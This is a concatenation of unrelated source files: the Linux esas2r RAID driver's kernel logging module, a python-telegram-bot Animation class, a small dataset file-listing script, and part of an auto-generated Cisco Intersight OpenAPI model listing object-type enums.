* linux/drivers/scsi/esas2r/esas2r_log.c
* For use with ATTO ExpressSAS R6xx SAS/SATA RAID controllers
*
* Copyright (c) 2001-2013 ATTO Technology, Inc.
* (mailto:[email protected])
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* NO WARRANTY
* THE PROGRAM IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED INCLUDING, WITHOUT
* LIMITATION, ANY WARRANTIES OR CONDITIONS OF TITLE, NON-INFRINGEMENT,
* MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. Each Recipient is
* solely responsible for determining the appropriateness of using and
* distributing the Program and assumes all risks associated with its
* exercise of rights under this Agreement, including but not limited to
* the risks and costs of program errors, damage to or loss of data,
* programs or equipment, and unavailability or interruption of operations.
*
* DISCLAIMER OF LIABILITY
* NEITHER RECIPIENT NOR ANY CONTRIBUTORS SHALL HAVE ANY LIABILITY FOR ANY
* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING WITHOUT LIMITATION LOST PROFITS), HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
* USE OR DISTRIBUTION OF THE PROGRAM OR THE EXERCISE OF ANY RIGHTS GRANTED
* HEREUNDER, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGES
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,
* USA.
*/
#include "esas2r.h"
/*
* this module within the driver is tasked with providing logging functionality.
* the event_log_level module parameter controls the level of messages that are
* written to the system log. the default level of messages that are written
* are critical and warning messages. if other types of messages are desired,
* one simply needs to load the module with the correct value for the
* event_log_level module parameter. for example:
*
* insmod <module> event_log_level=1
*
* will load the module and only critical events will be written by this module
* to the system log. if critical, warning, and information-level messages are
* desired, the correct value for the event_log_level module parameter
* would be as follows:
*
* insmod <module> event_log_level=3
*/
#define EVENT_LOG_BUFF_SIZE 1024
static long event_log_level = ESAS2R_LOG_DFLT;
module_param(event_log_level, long, S_IRUGO | S_IRUSR);
MODULE_PARM_DESC(event_log_level,
"Specifies the level of events to report to the system log. Critical and warning level events are logged by default.");
/* A shared buffer to use for formatting messages. */
static char event_buffer[EVENT_LOG_BUFF_SIZE];
/* A lock to protect the shared buffer used for formatting messages. */
static DEFINE_SPINLOCK(event_buffer_lock);
/**
* translates an esas2r-defined logging event level to a kernel logging level.
*
* @param [in] level the esas2r-defined logging event level to translate
*
* @return the corresponding kernel logging level.
*/
static const char *translate_esas2r_event_level_to_kernel(const long level)
{
switch (level) {
case ESAS2R_LOG_CRIT:
return KERN_CRIT;
case ESAS2R_LOG_WARN:
return KERN_WARNING;
case ESAS2R_LOG_INFO:
return KERN_INFO;
case ESAS2R_LOG_DEBG:
case ESAS2R_LOG_TRCE:
default:
return KERN_DEBUG;
}
}
/**
* the master logging function. this function will format the message as
* outlined by the formatting string, the input device information and the
* substitution arguments and output the resulting string to the system log.
*
* @param [in] level the event log level of the message
* @param [in] dev the device information
* @param [in] format the formatting string for the message
* @param [in] args the substition arguments to the formatting string
*
* @return 0 on success, or -1 if an error occurred.
*/
static int esas2r_log_master(const long level,
const struct device *dev,
const char *format,
va_list args)
{
if (level <= event_log_level) {
unsigned long flags = 0;
int retval = 0;
char *buffer = event_buffer;
size_t buflen = EVENT_LOG_BUFF_SIZE;
const char *fmt_nodev = "%s%s: ";
const char *fmt_dev = "%s%s [%s, %s, %s]";
const char *slevel =
translate_esas2r_event_level_to_kernel(level);
spin_lock_irqsave(&event_buffer_lock, flags);
memset(buffer, 0, buflen);
/*
* format the level onto the beginning of the string and do
* some pointer arithmetic to move the pointer to the point
* where the actual message can be inserted.
*/
if (dev == NULL) {
snprintf(buffer, buflen, fmt_nodev, slevel,
ESAS2R_DRVR_NAME);
} else {
snprintf(buffer, buflen, fmt_dev, slevel,
ESAS2R_DRVR_NAME,
(dev->driver ? dev->driver->name : "unknown"),
(dev->bus ? dev->bus->name : "unknown"),
dev_name(dev));
}
buffer += strlen(event_buffer);
buflen -= strlen(event_buffer);
retval = vsnprintf(buffer, buflen, format, args);
if (retval < 0) {
spin_unlock_irqrestore(&event_buffer_lock, flags);
return -1;
}
/*
* Put a line break at the end of the formatted string so that
* we don't wind up with run-on messages.
*/
printk("%s\n", event_buffer);
spin_unlock_irqrestore(&event_buffer_lock, flags);
}
return 0;
}
/**
* formats and logs a message to the system log.
*
* @param [in] level the event level of the message
* @param [in] format the formating string for the message
* @param [in] ... the substitution arguments to the formatting string
*
* @return 0 on success, or -1 if an error occurred.
*/
int esas2r_log(const long level, const char *format, ...)
{
int retval = 0;
va_list args;
va_start(args, format);
retval = esas2r_log_master(level, NULL, format, args);
va_end(args);
return retval;
}
/**
* formats and logs a message to the system log. this message will include
* device information.
*
* @param [in] level the event level of the message
* @param [in] dev the device information
* @param [in] format the formatting string for the message
* @param [in] ... the substitution arguments to the formatting string
*
* @return 0 on success, or -1 if an error occurred.
*/
int esas2r_log_dev(const long level,
const struct device *dev,
const char *format,
...)
{
int retval = 0;
va_list args;
va_start(args, format);
retval = esas2r_log_master(level, dev, format, args);
va_end(args);
return retval;
}
/**
* formats and logs a message to the system log. this message will include
* device information.
*
* @param [in] level the event level of the message
* @param [in] buf
* @param [in] len
*
* @return 0 on success, or -1 if an error occurred.
*/
int esas2r_log_hexdump(const long level,
const void *buf,
size_t len)
{
if (level <= event_log_level) {
print_hex_dump(translate_esas2r_event_level_to_kernel(level),
"", DUMP_PREFIX_OFFSET, 16, 1, buf,
len, true);
}
return 1;
}
|
#!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2017
# Leandro Toledo de Souza <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
"""This module contains an object that represents a Telegram Animation."""
from telegram import PhotoSize
from telegram import TelegramObject
class Animation(TelegramObject):
"""This object represents an animation file to be displayed in the message containing a game.
Attributes:
file_id (:obj:`str`): Unique file identifier.
thumb (:class:`telegram.PhotoSize`): Optional. Animation thumbnail as defined
by sender.
file_name (:obj:`str`): Optional. Original animation filename as defined by sender.
mime_type (:obj:`str`): Optional. MIME type of the file as defined by sender.
file_size (:obj:`int`): Optional. File size.
Args:
file_id (:obj:`str`): Unique file identifier.
thumb (:class:`telegram.PhotoSize`, optional): Animation thumbnail as defined by sender.
file_name (:obj:`str`, optional): Original animation filename as defined by sender.
mime_type (:obj:`str`, optional): MIME type of the file as defined by sender.
file_size (:obj:`int`, optional): File size.
"""
def __init__(self,
file_id,
thumb=None,
file_name=None,
mime_type=None,
file_size=None,
**kwargs):
self.file_id = file_id
self.thumb = thumb
self.file_name = file_name
self.mime_type = mime_type
self.file_size = file_size
self._id_attrs = (self.file_id,)
@classmethod
def de_json(cls, data, bot):
if not data:
return None
data = super(Animation, cls).de_json(data, bot)
data['thumb'] = PhotoSize.de_json(data.get('thumb'), bot)
return cls(**data)
|
import os
files = os.listdir("/datassd4t/lbd/Large_Automotive_Detection_Dataset_sampling/train")
files = [(file[:-9]+"\n").encode("utf-8") for file in files]
f = open("already_exist.txt", mode='wb')
f.writelines(files)
f.close()
f=open("already_exist.txt", mode='rb')
files = f.readlines()
print(files[:5]) |
"""
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. The Intersight OpenAPI document defines the complete set of properties that are returned in the HTTP response. From that perspective, a client can expect that no additional properties are returned, unless these properties are explicitly defined in the OpenAPI document. However, when a client uses an older version of the Intersight OpenAPI document, the server may send additional properties because the software is more recent than the client. In that case, the client may receive properties that it does not know about. Some generated SDKs perform a strict validation of the HTTP response body against the OpenAPI document. # noqa: E501
The version of the OpenAPI document: 1.0.9-4950
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from intersight.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from intersight.model.display_names import DisplayNames
from intersight.model.mo_base_mo_relationship import MoBaseMoRelationship
from intersight.model.mo_mo_ref import MoMoRef
from intersight.model.mo_tag import MoTag
from intersight.model.mo_version_context import MoVersionContext
from intersight.model.workflow_action_workflow_definition import WorkflowActionWorkflowDefinition
from intersight.model.workflow_base_data_type import WorkflowBaseDataType
from intersight.model.workflow_solution_action_definition import WorkflowSolutionActionDefinition
from intersight.model.workflow_solution_definition_relationship import WorkflowSolutionDefinitionRelationship
from intersight.model.workflow_validation_information import WorkflowValidationInformation
from intersight.model.workflow_workflow_definition_relationship import WorkflowWorkflowDefinitionRelationship
globals()['DisplayNames'] = DisplayNames
globals()['MoBaseMoRelationship'] = MoBaseMoRelationship
globals()['MoMoRef'] = MoMoRef
globals()['MoTag'] = MoTag
globals()['MoVersionContext'] = MoVersionContext
globals()['WorkflowActionWorkflowDefinition'] = WorkflowActionWorkflowDefinition
globals()['WorkflowBaseDataType'] = WorkflowBaseDataType
globals()['WorkflowSolutionActionDefinition'] = WorkflowSolutionActionDefinition
globals()['WorkflowSolutionDefinitionRelationship'] = WorkflowSolutionDefinitionRelationship
globals()['WorkflowValidationInformation'] = WorkflowValidationInformation
globals()['WorkflowWorkflowDefinitionRelationship'] = WorkflowWorkflowDefinitionRelationship
class WorkflowSolutionActionDefinitionRelationship(ModelComposed):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
('class_id',): {
'MO.MOREF': "mo.MoRef",
},
('action_type',): {
'EXTERNAL': "External",
'INTERNAL': "Internal",
'REPETITIVE': "Repetitive",
},
('allowed_instance_states',): {
'None': None,
'NOTCREATED': "NotCreated",
'INPROGRESS': "InProgress",
'FAILED': "Failed",
'OKAY': "Okay",
'DECOMMISSIONED': "Decommissioned",
},
('object_type',): {
'AAA.AUDITRECORD': "aaa.AuditRecord",
'AAA.RETENTIONCONFIG': "aaa.RetentionConfig",
'AAA.RETENTIONPOLICY': "aaa.RetentionPolicy",
'ACCESS.POLICY': "access.Policy",
'ADAPTER.CONFIGPOLICY': "adapter.ConfigPolicy",
'ADAPTER.EXTETHINTERFACE': "adapter.ExtEthInterface",
'ADAPTER.HOSTETHINTERFACE': "adapter.HostEthInterface",
'ADAPTER.HOSTFCINTERFACE': "adapter.HostFcInterface",
'ADAPTER.HOSTISCSIINTERFACE': "adapter.HostIscsiInterface",
'ADAPTER.UNIT': "adapter.Unit",
'ADAPTER.UNITEXPANDER': "adapter.UnitExpander",
'APPLIANCE.APPSTATUS': "appliance.AppStatus",
'APPLIANCE.AUTORMAPOLICY': "appliance.AutoRmaPolicy",
'APPLIANCE.BACKUP': "appliance.Backup",
'APPLIANCE.BACKUPPOLICY': "appliance.BackupPolicy",
'APPLIANCE.CERTIFICATESETTING': "appliance.CertificateSetting",
'APPLIANCE.DATAEXPORTPOLICY': "appliance.DataExportPolicy",
'APPLIANCE.DEVICECERTIFICATE': "appliance.DeviceCertificate",
'APPLIANCE.DEVICECLAIM': "appliance.DeviceClaim",
'APPLIANCE.DEVICEUPGRADEPOLICY': "appliance.DeviceUpgradePolicy",
'APPLIANCE.DIAGSETTING': "appliance.DiagSetting",
'APPLIANCE.EXTERNALSYSLOGSETTING': "appliance.ExternalSyslogSetting",
'APPLIANCE.FILEGATEWAY': "appliance.FileGateway",
'APPLIANCE.FILESYSTEMSTATUS': "appliance.FileSystemStatus",
'APPLIANCE.GROUPSTATUS': "appliance.GroupStatus",
'APPLIANCE.IMAGEBUNDLE': "appliance.ImageBundle",
'APPLIANCE.NODEINFO': "appliance.NodeInfo",
'APPLIANCE.NODESTATUS': "appliance.NodeStatus",
'APPLIANCE.RELEASENOTE': "appliance.ReleaseNote",
'APPLIANCE.REMOTEFILEIMPORT': "appliance.RemoteFileImport",
'APPLIANCE.RESTORE': "appliance.Restore",
'APPLIANCE.SETUPINFO': "appliance.SetupInfo",
'APPLIANCE.SYSTEMINFO': "appliance.SystemInfo",
'APPLIANCE.SYSTEMSTATUS': "appliance.SystemStatus",
'APPLIANCE.UPGRADE': "appliance.Upgrade",
'APPLIANCE.UPGRADEPOLICY': "appliance.UpgradePolicy",
'ASSET.CLUSTERMEMBER': "asset.ClusterMember",
'ASSET.DEPLOYMENT': "asset.Deployment",
'ASSET.DEPLOYMENTDEVICE': "asset.DeploymentDevice",
'ASSET.DEVICECLAIM': "asset.DeviceClaim",
'ASSET.DEVICECONFIGURATION': "asset.DeviceConfiguration",
'ASSET.DEVICECONNECTORMANAGER': "asset.DeviceConnectorManager",
'ASSET.DEVICECONTRACTINFORMATION': "asset.DeviceContractInformation",
'ASSET.DEVICECONTRACTNOTIFICATION': "asset.DeviceContractNotification",
'ASSET.DEVICEREGISTRATION': "asset.DeviceRegistration",
'ASSET.SUBSCRIPTION': "asset.Subscription",
'ASSET.SUBSCRIPTIONACCOUNT': "asset.SubscriptionAccount",
'ASSET.SUBSCRIPTIONDEVICECONTRACTINFORMATION': "asset.SubscriptionDeviceContractInformation",
'ASSET.TARGET': "asset.Target",
'BIOS.BOOTDEVICE': "bios.BootDevice",
'BIOS.BOOTMODE': "bios.BootMode",
'BIOS.POLICY': "bios.Policy",
'BIOS.SYSTEMBOOTORDER': "bios.SystemBootOrder",
'BIOS.TOKENSETTINGS': "bios.TokenSettings",
'BIOS.UNIT': "bios.Unit",
'BIOS.VFSELECTMEMORYRASCONFIGURATION': "bios.VfSelectMemoryRasConfiguration",
'BOOT.CDDDEVICE': "boot.CddDevice",
'BOOT.DEVICEBOOTMODE': "boot.DeviceBootMode",
'BOOT.DEVICEBOOTSECURITY': "boot.DeviceBootSecurity",
'BOOT.HDDDEVICE': "boot.HddDevice",
'BOOT.ISCSIDEVICE': "boot.IscsiDevice",
'BOOT.NVMEDEVICE': "boot.NvmeDevice",
'BOOT.PCHSTORAGEDEVICE': "boot.PchStorageDevice",
'BOOT.PRECISIONPOLICY': "boot.PrecisionPolicy",
'BOOT.PXEDEVICE': "boot.PxeDevice",
'BOOT.SANDEVICE': "boot.SanDevice",
'BOOT.SDDEVICE': "boot.SdDevice",
'BOOT.UEFISHELLDEVICE': "boot.UefiShellDevice",
'BOOT.USBDEVICE': "boot.UsbDevice",
'BOOT.VMEDIADEVICE': "boot.VmediaDevice",
'BULK.EXPORT': "bulk.Export",
'BULK.EXPORTEDITEM': "bulk.ExportedItem",
'BULK.MOCLONER': "bulk.MoCloner",
'BULK.MOMERGER': "bulk.MoMerger",
'BULK.REQUEST': "bulk.Request",
'BULK.SUBREQUESTOBJ': "bulk.SubRequestObj",
'CAPABILITY.ADAPTERUNITDESCRIPTOR': "capability.AdapterUnitDescriptor",
'CAPABILITY.CATALOG': "capability.Catalog",
'CAPABILITY.CHASSISDESCRIPTOR': "capability.ChassisDescriptor",
'CAPABILITY.CHASSISMANUFACTURINGDEF': "capability.ChassisManufacturingDef",
'CAPABILITY.CIMCFIRMWAREDESCRIPTOR': "capability.CimcFirmwareDescriptor",
'CAPABILITY.EQUIPMENTPHYSICALDEF': "capability.EquipmentPhysicalDef",
'CAPABILITY.EQUIPMENTSLOTARRAY': "capability.EquipmentSlotArray",
'CAPABILITY.FANMODULEDESCRIPTOR': "capability.FanModuleDescriptor",
'CAPABILITY.FANMODULEMANUFACTURINGDEF': "capability.FanModuleManufacturingDef",
'CAPABILITY.IOCARDCAPABILITYDEF': "capability.IoCardCapabilityDef",
'CAPABILITY.IOCARDDESCRIPTOR': "capability.IoCardDescriptor",
'CAPABILITY.IOCARDMANUFACTURINGDEF': "capability.IoCardManufacturingDef",
'CAPABILITY.PORTGROUPAGGREGATIONDEF': "capability.PortGroupAggregationDef",
'CAPABILITY.PSUDESCRIPTOR': "capability.PsuDescriptor",
'CAPABILITY.PSUMANUFACTURINGDEF': "capability.PsuManufacturingDef",
'CAPABILITY.SERVERMODELSCAPABILITYDEF': "capability.ServerModelsCapabilityDef",
'CAPABILITY.SERVERSCHEMADESCRIPTOR': "capability.ServerSchemaDescriptor",
'CAPABILITY.SIOCMODULECAPABILITYDEF': "capability.SiocModuleCapabilityDef",
'CAPABILITY.SIOCMODULEDESCRIPTOR': "capability.SiocModuleDescriptor",
'CAPABILITY.SIOCMODULEMANUFACTURINGDEF': "capability.SiocModuleManufacturingDef",
'CAPABILITY.SWITCHCAPABILITY': "capability.SwitchCapability",
'CAPABILITY.SWITCHDESCRIPTOR': "capability.SwitchDescriptor",
'CAPABILITY.SWITCHMANUFACTURINGDEF': "capability.SwitchManufacturingDef",
'CERTIFICATEMANAGEMENT.POLICY': "certificatemanagement.Policy",
'CHASSIS.CONFIGCHANGEDETAIL': "chassis.ConfigChangeDetail",
'CHASSIS.CONFIGIMPORT': "chassis.ConfigImport",
'CHASSIS.CONFIGRESULT': "chassis.ConfigResult",
'CHASSIS.CONFIGRESULTENTRY': "chassis.ConfigResultEntry",
'CHASSIS.IOMPROFILE': "chassis.IomProfile",
'CHASSIS.PROFILE': "chassis.Profile",
'CLOUD.AWSBILLINGUNIT': "cloud.AwsBillingUnit",
'CLOUD.AWSKEYPAIR': "cloud.AwsKeyPair",
'CLOUD.AWSNETWORKINTERFACE': "cloud.AwsNetworkInterface",
'CLOUD.AWSORGANIZATIONALUNIT': "cloud.AwsOrganizationalUnit",
'CLOUD.AWSSECURITYGROUP': "cloud.AwsSecurityGroup",
'CLOUD.AWSSUBNET': "cloud.AwsSubnet",
'CLOUD.AWSVIRTUALMACHINE': "cloud.AwsVirtualMachine",
'CLOUD.AWSVOLUME': "cloud.AwsVolume",
'CLOUD.AWSVPC': "cloud.AwsVpc",
'CLOUD.COLLECTINVENTORY': "cloud.CollectInventory",
'CLOUD.REGIONS': "cloud.Regions",
'CLOUD.SKUCONTAINERTYPE': "cloud.SkuContainerType",
'CLOUD.SKUDATABASETYPE': "cloud.SkuDatabaseType",
'CLOUD.SKUINSTANCETYPE': "cloud.SkuInstanceType",
'CLOUD.SKUNETWORKTYPE': "cloud.SkuNetworkType",
'CLOUD.SKUREGIONRATECARDS': "cloud.SkuRegionRateCards",
'CLOUD.SKUVOLUMETYPE': "cloud.SkuVolumeType",
'CLOUD.TFCAGENTPOOL': "cloud.TfcAgentpool",
'CLOUD.TFCORGANIZATION': "cloud.TfcOrganization",
'CLOUD.TFCWORKSPACE': "cloud.TfcWorkspace",
'COMM.HTTPPROXYPOLICY': "comm.HttpProxyPolicy",
'COMPUTE.BIOSPOSTPOLICY': "compute.BiosPostPolicy",
'COMPUTE.BLADE': "compute.Blade",
'COMPUTE.BLADEIDENTITY': "compute.BladeIdentity",
'COMPUTE.BOARD': "compute.Board",
'COMPUTE.MAPPING': "compute.Mapping",
'COMPUTE.PHYSICALSUMMARY': "compute.PhysicalSummary",
'COMPUTE.RACKUNIT': "compute.RackUnit",
'COMPUTE.RACKUNITIDENTITY': "compute.RackUnitIdentity",
'COMPUTE.SERVERPOWERPOLICY': "compute.ServerPowerPolicy",
'COMPUTE.SERVERSETTING': "compute.ServerSetting",
'COMPUTE.VMEDIA': "compute.Vmedia",
'COND.ALARM': "cond.Alarm",
'COND.ALARMAGGREGATION': "cond.AlarmAggregation",
'COND.HCLSTATUS': "cond.HclStatus",
'COND.HCLSTATUSDETAIL': "cond.HclStatusDetail",
'COND.HCLSTATUSJOB': "cond.HclStatusJob",
'CONNECTORPACK.CONNECTORPACKUPGRADE': "connectorpack.ConnectorPackUpgrade",
'CONNECTORPACK.UPGRADEIMPACT': "connectorpack.UpgradeImpact",
'CONVERGEDINFRA.HEALTHCHECKDEFINITION': "convergedinfra.HealthCheckDefinition",
'CONVERGEDINFRA.HEALTHCHECKEXECUTION': "convergedinfra.HealthCheckExecution",
'CONVERGEDINFRA.POD': "convergedinfra.Pod",
'CRD.CUSTOMRESOURCE': "crd.CustomResource",
'DEVICECONNECTOR.POLICY': "deviceconnector.Policy",
'EQUIPMENT.CHASSIS': "equipment.Chassis",
'EQUIPMENT.CHASSISIDENTITY': "equipment.ChassisIdentity",
'EQUIPMENT.CHASSISOPERATION': "equipment.ChassisOperation",
'EQUIPMENT.DEVICESUMMARY': "equipment.DeviceSummary",
'EQUIPMENT.EXPANDERMODULE': "equipment.ExpanderModule",
'EQUIPMENT.FAN': "equipment.Fan",
'EQUIPMENT.FANCONTROL': "equipment.FanControl",
'EQUIPMENT.FANMODULE': "equipment.FanModule",
'EQUIPMENT.FEX': "equipment.Fex",
'EQUIPMENT.FEXIDENTITY': "equipment.FexIdentity",
'EQUIPMENT.FEXOPERATION': "equipment.FexOperation",
'EQUIPMENT.FRU': "equipment.Fru",
'EQUIPMENT.IDENTITYSUMMARY': "equipment.IdentitySummary",
'EQUIPMENT.IOCARD': "equipment.IoCard",
'EQUIPMENT.IOCARDOPERATION': "equipment.IoCardOperation",
'EQUIPMENT.IOEXPANDER': "equipment.IoExpander",
'EQUIPMENT.LOCATORLED': "equipment.LocatorLed",
'EQUIPMENT.PSU': "equipment.Psu",
'EQUIPMENT.PSUCONTROL': "equipment.PsuControl",
'EQUIPMENT.RACKENCLOSURE': "equipment.RackEnclosure",
'EQUIPMENT.RACKENCLOSURESLOT': "equipment.RackEnclosureSlot",
'EQUIPMENT.SHAREDIOMODULE': "equipment.SharedIoModule",
'EQUIPMENT.SWITCHCARD': "equipment.SwitchCard",
'EQUIPMENT.SYSTEMIOCONTROLLER': "equipment.SystemIoController",
'EQUIPMENT.TPM': "equipment.Tpm",
'EQUIPMENT.TRANSCEIVER': "equipment.Transceiver",
'ETHER.HOSTPORT': "ether.HostPort",
'ETHER.NETWORKPORT': "ether.NetworkPort",
'ETHER.PHYSICALPORT': "ether.PhysicalPort",
'ETHER.PORTCHANNEL': "ether.PortChannel",
'EXTERNALSITE.AUTHORIZATION': "externalsite.Authorization",
'FABRIC.APPLIANCEPCROLE': "fabric.AppliancePcRole",
'FABRIC.APPLIANCEROLE': "fabric.ApplianceRole",
'FABRIC.CONFIGCHANGEDETAIL': "fabric.ConfigChangeDetail",
'FABRIC.CONFIGRESULT': "fabric.ConfigResult",
'FABRIC.CONFIGRESULTENTRY': "fabric.ConfigResultEntry",
'FABRIC.ELEMENTIDENTITY': "fabric.ElementIdentity",
'FABRIC.ESTIMATEIMPACT': "fabric.EstimateImpact",
'FABRIC.ETHNETWORKCONTROLPOLICY': "fabric.EthNetworkControlPolicy",
'FABRIC.ETHNETWORKGROUPPOLICY': "fabric.EthNetworkGroupPolicy",
'FABRIC.ETHNETWORKPOLICY': "fabric.EthNetworkPolicy",
'FABRIC.FCNETWORKPOLICY': "fabric.FcNetworkPolicy",
'FABRIC.FCSTORAGEROLE': "fabric.FcStorageRole",
'FABRIC.FCUPLINKPCROLE': "fabric.FcUplinkPcRole",
'FABRIC.FCUPLINKROLE': "fabric.FcUplinkRole",
'FABRIC.FCOEUPLINKPCROLE': "fabric.FcoeUplinkPcRole",
'FABRIC.FCOEUPLINKROLE': "fabric.FcoeUplinkRole",
'FABRIC.FLOWCONTROLPOLICY': "fabric.FlowControlPolicy",
'FABRIC.LINKAGGREGATIONPOLICY': "fabric.LinkAggregationPolicy",
'FABRIC.LINKCONTROLPOLICY': "fabric.LinkControlPolicy",
'FABRIC.MULTICASTPOLICY': "fabric.MulticastPolicy",
'FABRIC.PCMEMBER': "fabric.PcMember",
'FABRIC.PCOPERATION': "fabric.PcOperation",
'FABRIC.PORTMODE': "fabric.PortMode",
'FABRIC.PORTOPERATION': "fabric.PortOperation",
'FABRIC.PORTPOLICY': "fabric.PortPolicy",
'FABRIC.SERVERROLE': "fabric.ServerRole",
'FABRIC.SWITCHCLUSTERPROFILE': "fabric.SwitchClusterProfile",
'FABRIC.SWITCHCONTROLPOLICY': "fabric.SwitchControlPolicy",
'FABRIC.SWITCHPROFILE': "fabric.SwitchProfile",
'FABRIC.SYSTEMQOSPOLICY': "fabric.SystemQosPolicy",
'FABRIC.UPLINKPCROLE': "fabric.UplinkPcRole",
'FABRIC.UPLINKROLE': "fabric.UplinkRole",
'FABRIC.VLAN': "fabric.Vlan",
'FABRIC.VSAN': "fabric.Vsan",
'FAULT.INSTANCE': "fault.Instance",
'FC.PHYSICALPORT': "fc.PhysicalPort",
'FC.PORTCHANNEL': "fc.PortChannel",
'FCPOOL.FCBLOCK': "fcpool.FcBlock",
'FCPOOL.LEASE': "fcpool.Lease",
'FCPOOL.POOL': "fcpool.Pool",
'FCPOOL.POOLMEMBER': "fcpool.PoolMember",
'FCPOOL.UNIVERSE': "fcpool.Universe",
'FEEDBACK.FEEDBACKPOST': "feedback.FeedbackPost",
'FIRMWARE.BIOSDESCRIPTOR': "firmware.BiosDescriptor",
'FIRMWARE.BOARDCONTROLLERDESCRIPTOR': "firmware.BoardControllerDescriptor",
'FIRMWARE.CHASSISUPGRADE': "firmware.ChassisUpgrade",
'FIRMWARE.CIMCDESCRIPTOR': "firmware.CimcDescriptor",
'FIRMWARE.DIMMDESCRIPTOR': "firmware.DimmDescriptor",
'FIRMWARE.DISTRIBUTABLE': "firmware.Distributable",
'FIRMWARE.DISTRIBUTABLEMETA': "firmware.DistributableMeta",
'FIRMWARE.DRIVEDESCRIPTOR': "firmware.DriveDescriptor",
'FIRMWARE.DRIVERDISTRIBUTABLE': "firmware.DriverDistributable",
'FIRMWARE.EULA': "firmware.Eula",
'FIRMWARE.FIRMWARESUMMARY': "firmware.FirmwareSummary",
'FIRMWARE.GPUDESCRIPTOR': "firmware.GpuDescriptor",
'FIRMWARE.HBADESCRIPTOR': "firmware.HbaDescriptor",
'FIRMWARE.IOMDESCRIPTOR': "firmware.IomDescriptor",
'FIRMWARE.MSWITCHDESCRIPTOR': "firmware.MswitchDescriptor",
'FIRMWARE.NXOSDESCRIPTOR': "firmware.NxosDescriptor",
'FIRMWARE.PCIEDESCRIPTOR': "firmware.PcieDescriptor",
'FIRMWARE.PSUDESCRIPTOR': "firmware.PsuDescriptor",
'FIRMWARE.RUNNINGFIRMWARE': "firmware.RunningFirmware",
'FIRMWARE.SASEXPANDERDESCRIPTOR': "firmware.SasExpanderDescriptor",
'FIRMWARE.SERVERCONFIGURATIONUTILITYDISTRIBUTABLE': "firmware.ServerConfigurationUtilityDistributable",
'FIRMWARE.STORAGECONTROLLERDESCRIPTOR': "firmware.StorageControllerDescriptor",
'FIRMWARE.SWITCHUPGRADE': "firmware.SwitchUpgrade",
'FIRMWARE.UNSUPPORTEDVERSIONUPGRADE': "firmware.UnsupportedVersionUpgrade",
'FIRMWARE.UPGRADE': "firmware.Upgrade",
'FIRMWARE.UPGRADEIMPACT': "firmware.UpgradeImpact",
'FIRMWARE.UPGRADEIMPACTSTATUS': "firmware.UpgradeImpactStatus",
'FIRMWARE.UPGRADESTATUS': "firmware.UpgradeStatus",
'FORECAST.CATALOG': "forecast.Catalog",
'FORECAST.DEFINITION': "forecast.Definition",
'FORECAST.INSTANCE': "forecast.Instance",
'GRAPHICS.CARD': "graphics.Card",
'GRAPHICS.CONTROLLER': "graphics.Controller",
'HCL.COMPATIBILITYSTATUS': "hcl.CompatibilityStatus",
'HCL.DRIVERIMAGE': "hcl.DriverImage",
'HCL.EXEMPTEDCATALOG': "hcl.ExemptedCatalog",
'HCL.HYPERFLEXSOFTWARECOMPATIBILITYINFO': "hcl.HyperflexSoftwareCompatibilityInfo",
'HCL.OPERATINGSYSTEM': "hcl.OperatingSystem",
'HCL.OPERATINGSYSTEMVENDOR': "hcl.OperatingSystemVendor",
'HCL.SUPPORTEDDRIVERNAME': "hcl.SupportedDriverName",
'HYPERFLEX.ALARM': "hyperflex.Alarm",
